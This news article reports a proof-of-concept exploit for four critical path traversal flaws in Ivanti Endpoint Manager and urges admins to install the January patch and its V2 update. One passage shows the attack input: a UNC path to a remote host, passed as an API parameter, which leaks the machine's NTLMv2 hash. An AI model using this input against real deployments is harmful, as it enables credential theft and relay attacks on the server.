Ivanti endpoint manager can become endpoint ravager, thanks to quartet of critical flaws

Security engineers have released a proof-of-concept exploit for four critical Ivanti Endpoint Manager bugs, giving those who haven't already installed patches released in January extra incentive to revisit their to-do lists.

The four vulnerabilities, all of which were rated 9.8 out of 10 CVSS severity scores, are tracked as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159.

Ivanti described all four as absolute path traversal flaws and fixed them for its Windows-based product in its January update.

At the time, the vendor didn't provide much detail about the critical security holes other than to note that a successful exploit would allow "a remote unauthenticated attacker to leak sensitive information."

A lot more info about the bugs is now available thanks to the appearance of a technical write-up by Zach Hanley, a vulnerability researcher at infosec consultancy Horizon3.ai. Hanley found and reported the flaws to Ivanti in October 2024, and on Wednesday published a proof-of-concept (PoC) exploit.

According to Hanley, all four flaws can be exploited by an unauthenticated attacker and can be abused "to coerce the Ivanti [Endpoint Manager] machine account credential to be used in relay attacks, potentially allowing for server compromise."

In slightly plainer English, what this all means is that it's possible for any miscreant who can reach the web-based APIs of a vulnerable Ivanti Endpoint Manager deployment to make that software reach out to a remote server when looking up a directory, and thus leak the manager's host machine's NTLMv2 hash to that remote server, which can be potentially used for account impersonation and other nefarious acts that lead to a system compromise.

It's as easy as passing a path such as \\\\10.0.0.1\\tmp\\thing[.]txt to parts of the API as a parameter, the manager then attempts to authenticate with 10.0.0.1 to access the path, and thus leaks an NTLMv2 hash to that remote box.

• Nominet probes network intrusion linked to Ivanti zero-day exploit
• Zero-day exploits plague Ivanti Connect Secure appliances for second year running
• SonicWall firewalls now under attack: Patch ASAP or risk intrusion via your SSL VPN
• FreSSH bugs undiscovered for years threaten OpenSSH security

Ivanti told us it has found "no evidence” the flaws have been targeted, reminded us that patches are available, and urged their adoption now that PoC code is available as “new information in the public domain increases the risk of potential exploitation.”

That’s sound advice as attackers really like poking holes in Ivanti products, as was the case when Ivanti addressed zero-day exploits last month.

Ponder patch 2.0, too

Regardless of whether you applied the January patch, Ivanti has urged all users to implement a second version of its fix because the first caused an issue with the Windows "Action" tab that prevented users from creating new Windows Action packages or editing existing ones.

"We have updated this patch to a V2 version that restores the 'Actions' tab," a February 18 update to Ivanti’s security advisory noted. "If the original version was installed, V2 needs to be installed as well to restore the 'Actions' tab." ®